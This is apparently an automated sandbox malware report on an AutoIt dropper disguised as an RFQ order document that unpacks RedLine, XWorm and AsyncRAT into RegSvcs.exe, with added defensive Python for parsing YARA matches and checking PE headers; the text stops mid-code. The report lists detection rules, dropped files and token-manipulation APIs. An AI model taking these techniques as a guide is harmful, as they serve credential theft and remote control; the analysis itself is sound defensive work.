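The YARA matches above come from two rule sources (Sekoia.io's RedLine and XWorm string rules, ditekSHen's AsyncRAT rule) across three artefact types: unpacked PE regions out of RegSvcs.exe and build.exe, raw memory dumps, and dropped files. Read one line at a time, two things are easy to miss: every AsyncRAT hit lands on a region, process or file that the XWorm rule also hits, and process 5 (RegSvcs.exe) hosts RedLine regions (3dxxxxx) and XWorm regions (2dxxxxx) at the same time. The Python below is an added example and not part of the report: it parses both match-line shapes the report uses (the short "description Author: x" form and the metadata form with rule name, creation date and id), maps each source back to its sandbox process number, and reports per-family artefacts, per-process families and sources carrying more than one family label. The keyword-to-family table is an assumption of the example; the sample lines are copied from the report.

```python
import re
from collections import defaultdict

# Constructed input: match lines copied from this report, in both shapes the report uses
# (short "description Author: x" and long "rule_name author = x, description = ..., id = ...").
SAMPLE_MATCHES = r"""
Source: 5.2.RegSvcs.exe.3d96bf0.6.raw.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000000.1260246043.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.0.build.exe.6b0000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
"""

MATCH_RE = re.compile(r"^Source: (?P<source>.+?), type: (?P<kind>[A-Z]+) Matched rule: (?P<rest>.+)$")
META_RE = re.compile(r"(\w+) = (.*?)(?=, \w+ = |$)")   # values may themselves contain commas
FAMILY_KEYWORDS = (("redline", "RedLine"), ("xworm", "XWorm"), ("asyncrat", "AsyncRAT"))


def family_of(text):
    """Derive a family label from rule name/description (the keyword table is an assumption)."""
    low = text.lower()
    return next((fam for needle, fam in FAMILY_KEYWORDS if needle in low), "unknown")


def process_index(source):
    """Sandbox process number from '5.2.RegSvcs.exe...unpack' or '00000005.00000002....sdmp';
    None for dropped-file paths."""
    m = re.match(r"^([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.", source)
    if m:
        return int(m[1], 16)
    m = re.match(r"^(\d+)\.\d+\.", source)
    return int(m[1]) if m else None


def parse_match(line):
    m = MATCH_RE.match(line)
    if not m:
        return None
    rest, meta = m["rest"], {}
    if " author = " in rest:                       # long form: rule name followed by metadata
        rule, _, tail = rest.partition(" author = ")
        meta = dict(META_RE.findall("author = " + tail))
        author, desc = meta.get("author", "?"), meta.get("description", rule)
    else:                                          # short form: description then Author
        desc, sep, author = rest.rpartition(" Author: ")
        if not sep:
            desc, author = rest, "?"
        rule = desc
    return {"source": m["source"], "kind": m["kind"], "process": process_index(m["source"]),
            "rule": rule, "author": author, "description": desc, "meta": meta,
            "family": family_of(rule + " " + desc)}


def summarize(report_text):
    matches = [p for p in map(parse_match, report_text.splitlines()) if p]
    by_family = defaultdict(lambda: {"rules": set(), "sources": defaultdict(set)})
    for p in matches:
        by_family[p["family"]]["rules"].add(f'{p["rule"]} ({p["author"]})')
        by_family[p["family"]]["sources"][p["kind"]].add(p["source"])
    return matches, by_family


def overlaps(matches):
    """Sources hit by rules of more than one family: the same bytes carry several labels,
    which is something to reconcile, not evidence of several implants."""
    fams = defaultdict(set)
    for p in matches:
        fams[p["source"]].add(p["family"])
    return {src: sorted(f) for src, f in fams.items() if len(f) > 1}


def families_by_process(matches):
    """Which families were matched inside which sandbox process (dropped files excluded)."""
    out = defaultdict(set)
    for p in matches:
        if p["process"] is not None:
            out[p["process"]].add(p["family"])
    return dict(out)


if __name__ == "__main__":
    matches, fams = summarize(SAMPLE_MATCHES)
    for fam, d in fams.items():
        print(fam, {k: len(v) for k, v in d["sources"].items()}, sorted(d["rules"]))
    print("overlaps:", overlaps(matches))
    print("per process:", families_by_process(matches))
```

A rule name is a detection label, not attribution: when a second family's rule fires only on bytes a first family's rule already covers, count one implant and record both rule ids in the ticket. The DROPPED matches are the ones to hash and block, because build.exe and XClient.exe exist on disk, whereas the UNPACKEDPE regions exist only inside the RegSvcs.exe process that both payloads were mapped into.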
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: This is a third-party compiled AutoIt script. 0_2_00403B3A
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1231041983.00000000041D3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_9e4699e2-5
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1231041983.00000000041D3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_20e98757-3
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233074817.00000000004B4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_3812767e-1
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233074817.00000000004B4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_6b2b8da6-3
Source: exhilaratingly.exe, 00000004.00000000.1231562986.00000000004B4000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_a22fbef0-4
Source: exhilaratingly.exe, 00000004.00000000.1231562986.00000000004B4000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_1e8ad1da-d
Source: exhilaratingly.exe, 00000014.00000002.1393593446.00000000004B4000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_10b85716-2
Source: exhilaratingly.exe, 00000014.00000002.1393593446.00000000004B4000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_61f107b2-f
Source: initial sample Static PE information: Filename: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_0046A1EF
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00458310
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_004651BD
Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\d225894719a6adcd.bin Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0040E6A0 0_2_0040E6A0
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0042D975 0_2_0042D975
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0040FCE0 0_2_0040FCE0
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004221C5 0_2_004221C5
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004362D2 0_2_004362D2
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004803DA 0_2_004803DA
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0043242E 0_2_0043242E
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004225FA 0_2_004225FA
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0045E616 0_2_0045E616
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004166E1 0_2_004166E1
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0043878F 0_2_0043878F
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00436844 0_2_00436844
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00480857 0_2_00480857
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00418808 0_2_00418808
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00468889 0_2_00468889
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0042CB21 0_2_0042CB21
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00532CC8 0_2_00532CC8
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00436DB6 0_2_00436DB6
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00416F9E 0_2_00416F9E
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00413030 0_2_00413030
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0042F1D9 0_2_0042F1D9
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00423187 0_2_00423187
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00401287 0_2_00401287
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00421484 0_2_00421484
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00415520 0_2_00415520
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00427696 0_2_00427696
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00415760 0_2_00415760
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00421978 0_2_00421978
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00439AB5 0_2_00439AB5
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00487DDB 0_2_00487DDB
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00421D90 0_2_00421D90
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0042BDA6 0_2_0042BDA6
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0040DF00 0_2_0040DF00
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00413FE0 0_2_00413FE0
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00BB9F88 0_2_00BB9F88
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FC00D9 0_2_02FC00D9
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02F851EE 0_2_02F851EE
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02F86EAF 0_2_02F86EAF
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FBC7F0 0_2_02FBC7F0
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FB3780 0_2_02FB3780
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FBD580 0_2_02FBD580
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02F87B71 0_2_02F87B71
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FC39A3 0_2_02FC39A3
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FB5980 0_2_02FB5980
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02F87F80 0_2_02F87F80
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_00A4DC98 4_2_00A4DC98
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_012C515C 4_2_012C515C
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_012C39A3 4_2_012C39A3
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_012B5980 4_2_012B5980
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_01286EAF 4_2_01286EAF
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_012851EE 4_2_012851EE
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_012BD580 4_2_012BD580
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_01287F80 4_2_01287F80
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_012B3780 4_2_012B3780
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_012BC7F0 4_2_012BC7F0
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_00D4DC74 6_2_00D4DC74
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_056848B0 6_2_056848B0
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_06B886C8 6_2_06B886C8
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_06B8C0F8 6_2_06B8C0F8
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_06B8E188 6_2_06B8E188
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_06B8EEE8 6_2_06B8EEE8
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_06B8A959 6_2_06B8A959
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_06B893C8 6_2_06B893C8
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_06B87D60 6_2_06B87D60
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_06B886B9 6_2_06B886B9
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_06B86230 6_2_06B86230
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_06B86240 6_2_06B86240
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_06B88DB8 6_2_06B88DB8
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_07235E18 6_2_07235E18
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_07231678 6_2_07231678
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_07230688 6_2_07230688
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_07231DC0 6_2_07231DC0
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_07230B08 6_2_07230B08
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_072323C8 6_2_072323C8
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_07230040 6_2_07230040
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_07231210 6_2_07231210
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_07230006 6_2_07230006
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_07230014 6_2_07230014
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_056848A0 6_2_056848A0
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Code function: 7_2_00007FF88B4D038D 7_2_00007FF88B4D038D
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Code function: 7_2_00007FF88B4D75E6 7_2_00007FF88B4D75E6
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Code function: 7_2_00007FF88B4D2F90 7_2_00007FF88B4D2F90
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Code function: 7_2_00007FF88B4D5DBD 7_2_00007FF88B4D5DBD
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Code function: 7_2_00007FF88B4D3DE1 7_2_00007FF88B4D3DE1
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Code function: 10_2_0099CA20 10_2_0099CA20
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Code function: 10_2_00998789 10_2_00998789
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Code function: 10_2_009BA810 10_2_009BA810
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Code function: 10_2_009979F0 10_2_009979F0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Code function: 10_2_009B92A0 10_2_009B92A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Code function: 10_2_009B93B0 10_2_009B93B0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Code function: 10_2_00997C00 10_2_00997C00
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Code function: 10_2_009C2D40 10_2_009C2D40
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Code function: 10_2_009BEEB0 10_2_009BEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 15_2_022792A0 15_2_022792A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 15_2_0227EEB0 15_2_0227EEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 15_2_022793B0 15_2_022793B0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 15_2_02257C00 15_2_02257C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 15_2_0227A810 15_2_0227A810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 15_2_02282D40 15_2_02282D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 15_2_022579F0 15_2_022579F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF88B4B150B 16_2_00007FF88B4B150B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF88B5830E9 16_2_00007FF88B5830E9
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00B539A3 20_2_00B539A3
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00B16EAF 20_2_00B16EAF
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00B45980 20_2_00B45980
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00B151EE 20_2_00B151EE
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00B4D580 20_2_00B4D580
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00B17F80 20_2_00B17F80
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00B43780 20_2_00B43780
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00B4C7F0 20_2_00B4C7F0
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00C09680 20_2_00C09680
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00007FF88B5A30B2 27_2_00007FF88B5A30B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FF88B5B30E9 29_2_00007FF88B5B30E9
Source: C:\Windows\System32\FXSSVC.exe Code function: 39_2_00D4A810 39_2_00D4A810
Source: C:\Windows\System32\FXSSVC.exe Code function: 39_2_00D27C00 39_2_00D27C00
Source: C:\Windows\System32\FXSSVC.exe Code function: 39_2_00D279F0 39_2_00D279F0
Source: C:\Windows\System32\FXSSVC.exe Code function: 39_2_00D52D40 39_2_00D52D40
Source: C:\Windows\System32\FXSSVC.exe Code function: 39_2_00D4EEB0 39_2_00D4EEB0
Source: C:\Windows\System32\FXSSVC.exe Code function: 39_2_00D492A0 39_2_00D492A0
Source: C:\Windows\System32\FXSSVC.exe Code function: 39_2_00D493B0 39_2_00D493B0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Load Driver
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Security
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: String function: 00428900 appears 41 times
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: String function: 00420AE3 appears 70 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8088 -s 992
Source: chrmstp.exe.3.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.3.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: updater.exe0.3.dr Static PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
Source: Acrobat.exe.3.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: SingleClientServicesUpdater.exe.3.dr Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: identity_helper.exe.3.dr Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.3.dr Static PE information: Number of sections : 11 > 10
Source: chrome_pwa_launcher.exe.3.dr Static PE information: Number of sections : 11 > 10
Source: setup.exe.3.dr Static PE information: Number of sections : 13 > 10
Source: elevation_service.exe.3.dr Static PE information: Number of sections : 12 > 10
Source: elevated_tracing_service.exe.3.dr Static PE information: Number of sections : 12 > 10
Source: chrmstp.exe.3.dr Static PE information: Number of sections : 14 > 10
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1226844308.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameALG.exej% vs RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1221941596.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamearmsvc.exeN vs RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
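The static PE lines above are two cheap header checks: the section count, which the sandbox flags above 10 on several Edge/Chromium helper binaries it saw dropped or modified (a count that those builds carry legitimately, so on its own it is a weak signal), and the COFF Characteristics flags, which for the sample decode to EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE and 32BIT_MACHINE. The Python below is an added example, not part of the report or of any named tool: it reads only the DOS header, PE signature, COFF header and section table, decodes the characteristics bits, applies the same greater-than-10 heuristic, and adds a check for sections that are both writable and executable, a packer or self-modifying-code sign that says more than the raw count. build_pe assembles constructed header-only test images so the block runs offline; the flag values are the documented IMAGE_FILE_* and IMAGE_SCN_* constants.

```python
import struct

# IMAGE_FILE_* characteristics bits from the COFF header; the report prints the set
# ones for this sample as EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE.
IMAGE_FILE_FLAGS = {
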